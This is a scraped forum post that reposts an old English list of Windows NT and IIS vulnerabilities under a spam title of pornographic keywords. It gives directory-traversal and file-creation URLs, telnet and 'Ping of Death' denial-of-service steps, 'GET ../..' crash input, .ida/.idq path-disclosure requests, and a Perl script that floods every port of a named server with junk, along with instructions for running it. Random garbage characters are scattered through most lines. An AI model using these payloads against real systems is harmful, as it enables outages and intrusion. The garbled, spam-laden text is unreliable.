国产真人无遮挡作爱免费视频|天堂亚洲性爱在线播放|99福利视频网址|一区二区三区精品国产

<dl id="wesae"><small id="wesae"></small></dl>
  • <code id="wesae"><abbr id="wesae"></abbr></code>
  • <rt id="wesae"><code id="wesae"></code></rt>
    <dfn id="wesae"><dl id="wesae"></dl></dfn>
  • <dl id="wesae"><abbr id="wesae"></abbr></dl>
  • <blockquote id="wesae"></blockquote>

     找回密碼
     注冊

    QQ登錄

    只需一步,快速開始

    NT的漏洞及描述(英文)

    [復(fù)制鏈接]
    1#
    發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序?yàn)g覽 |閱讀模式
    受影響系統(tǒng):4.0,iis 1.0' J% _; n" K' j% ^
    A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.9 C+ X7 K2 j& h5 ^9 |" `. F

    , X4 l; O0 u5 b% o3 H9 j, }6 ~! o- J9 CA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
      ^, w0 C; L, @0 t/ \
    1 i# Q4 T( a% }! Z  hBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
    ) ~( b$ `  x+ Q; O+ Y7 Y; C' V2 Q4 L" Z* Z+ M
    --------------------------------------------------------------------/ Z! |" T" U" ]6 X( O- C! y: C
    & m  N9 j% _7 L
    受影響系統(tǒng):4.0
    - u8 g+ V4 {* m  ~6 t) l; PA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
    " @* Z. e* v) B6 A" A& f5 p* u
    1 m: `1 b* N: b6 p( L+ Z( G8 O! VIf the file 'target.bat' exists, the file will be truncated.
    , q" d$ F8 j' }% L
    & i/ ~4 ]- D- ~: z  \- R; ^3 d+ I# @, W$ l" W5 |' X: \" c
    A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.8 c8 d$ o% I: Y- S/ h: p9 f+ E8 p# A9 X  X
    % t  V+ ^) K2 z. J1 a
    ----------------------------------------------------------------------  Z; ^8 Q8 Y/ o( ?% s8 ]4 d" S# S
    2 P. E* P* z) K: A
    受影響系統(tǒng):3.51,4.0$ y( o) p7 d: n3 Q
    Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.$ J4 q  j: h3 q7 p
    3 ^/ m! A* j0 E0 a
    The following steps;
    % _! g% H: r+ ~9 r) b1 j- R5 Z( I0 J- Y* E( G4 ^
    Telnet to an NT 4.0 system on port 135
      s# k- `8 g$ |  L, A/ P" mType about 10 characters followed by a <CR> 9 Z% [+ z2 M# j6 y- {
    Exit Telnet
    * v5 m0 X5 s& v( Fresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system./ e+ h! {2 R5 L+ H* W3 s0 ~: [. U7 Y

    - i* S$ s# n/ [& Z5 eWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.* D, m* J  [% B7 \) d* a
    1 @$ @6 j8 F9 [2 Z8 L$ Z. F2 a7 j! N
    The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.$ C8 G* h9 m, }- S' |0 x3 v3 J

    . t7 i$ c6 w$ M9 T$ I* ?If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.' ^) \7 ^% ~  C9 g" k; R" I
    ( H6 E$ i5 h9 Y! v, _
    The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):8 w8 S/ ~( J: V6 Q

    , l% K  q( T5 D* `* n/*begin poke code*/+ L- m( q  O( j+ V. [0 C

    + {5 k+ m; g: |use Socket;
    ; I8 V$ v. a' G1 }! x5 Puse FileHandle;5 E4 _$ s5 T. ?5 H+ \' F/ V7 ?
    require "chat2.pl";
    5 W- x2 ^# T9 j9 h7 ?% ^: W- ?* J& V
    2 f/ T+ ]: k1 [( z$systemname = $ARGV[0] && shift;9 N2 P/ W/ R7 m$ L
    # p1 o5 E7 {  b5 }) ~8 R) X0 j/ g
    $verbose = 1; # tell me what you're hitting
    ! v5 q1 s/ \6 g; ?$knownports = 1; # don't hit known problem ports5 e& [1 x5 S9 g2 z: @& G
    for ($port = $0; $port<65535; $port++) 1 a5 V3 G: x9 e" O
    {1 S& G' ?) N* l/ C- y! K) i
    1 `: ^& m1 A& w  H; U2 t6 P
    8 W' T! P9 w7 Z8 ~+ Z; V& R7 @5 N
    if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {( k. V/ `3 S3 w8 B# \
    next;' H% q$ {4 r* s% i5 C
    }  x) p8 _$ M9 Z0 J+ W
    $fh = chat::open_port($systemname, $port);
    5 |+ K6 m5 u- Q+ Lchat::print ($fh,"This is about ten characters or more");* \% E& x+ Q3 Q! a' {+ f
    if ($verbose) {
    2 Q3 L+ t" t. Xprint "Trying port: $port\n";' S5 l$ E# c/ w2 ^( [* ^# U
    }
    9 B4 s. u* G/ W8 i+ e. L" N7 O, Gchat::close($fh);
    ; W( n' h  F8 n- B$ O1 o1 e" t1 T# @" R: N! H% O% Y; n
    }
    - y0 G- r6 {' r$ X2 w% W, U" f
    ! C; W5 z, W! j( S3 g* f
    2 F; k6 b! Q& d: n% G/*end poke code*/
    . _4 @/ V$ l0 E& H) N! B6 W
    5 d2 g6 t+ |8 y& P* ?3 L) DSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
    1 O6 Z9 M) u# }1 l7 ~- n, D0 h6 U" z/ M/ B/ l4 ]& o2 r$ {2 |
    --------------------------------------------------------------------------------+ r, f& s4 G1 c, K. E
    ' x* L2 |% h3 M6 G' J+ {' X% u/ C
    受影響系統(tǒng):4.0
    3 ?$ u2 K  J( o( _, f7 G) |2 TUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
    ' }& I- l4 v+ r1 u- v; R$ `! f5 c: u6 n3 m' t( `/ {/ O$ \5 O
    This attack causes Dr. Watson to display an alert window and to log an error: 4 n) ~4 T& X: a$ G6 U7 F0 o

    2 V" j2 I0 Z2 K/ a: @6 |, X3 f; }0 ^( ["The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
    , ^+ _  ?4 E2 s- j& E. ~0 \0 `8 m; g& Y; \3 Z
    --------------------------------------------------------------------------------: g2 z8 ^& a9 z% S' p& G) E( x# I
    0 i' b7 @, ]/ i  J' |
    受影響系統(tǒng):3.51,4.0
    + U: h$ d  Z) |Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:9 x/ p1 {- r) \2 K8 O  E" z
    . C! K1 l1 V+ r8 C( d3 r! q$ G
    STOP: 0X0000001E
    8 x5 F9 p7 `9 t3 G  T! L! \KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
    % y. s( f3 e7 [' @8 [) Z1 R; M3 t8 }+ M. i, I* ]( r) L  v* V
    -OR-
    / T7 c6 x* G/ R3 s* y0 G
    / S. P  B  Q+ k- r. q. U4 RSTOP: 0x0000000A! I1 L. @. z" B7 h
    IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
    2 I' N9 {8 x+ W" l% u8 Y0 H2 e9 N+ d3 H. R
    NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.; Z$ O, |, k( c2 j1 \6 V# \- w
    ) X3 P" H/ H% u! _5 A+ Y
    --------------------------------------------------------------------------------# b" l0 e$ {3 W8 i

    . X7 s" N6 T8 b6 t% W: x8 j6 ^Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
    0 P# V. I  d' a$ x# c
    6 D% J7 T! S6 m% u--------------------------------------------------------' T2 g  {* `: f! n, }: Y- Y6 I

    " g. f1 c7 p" v" P# }, j( c: K/ O5 lIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
    您需要登錄后才可以回帖 登錄 | 注冊

    本版積分規(guī)則

    QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

    GMT+8, 2025-5-4 21:32

    Powered by Discuz! X3.5

    © 2001-2025 Discuz! Team.

    快速回復(fù) 返回頂部 返回列表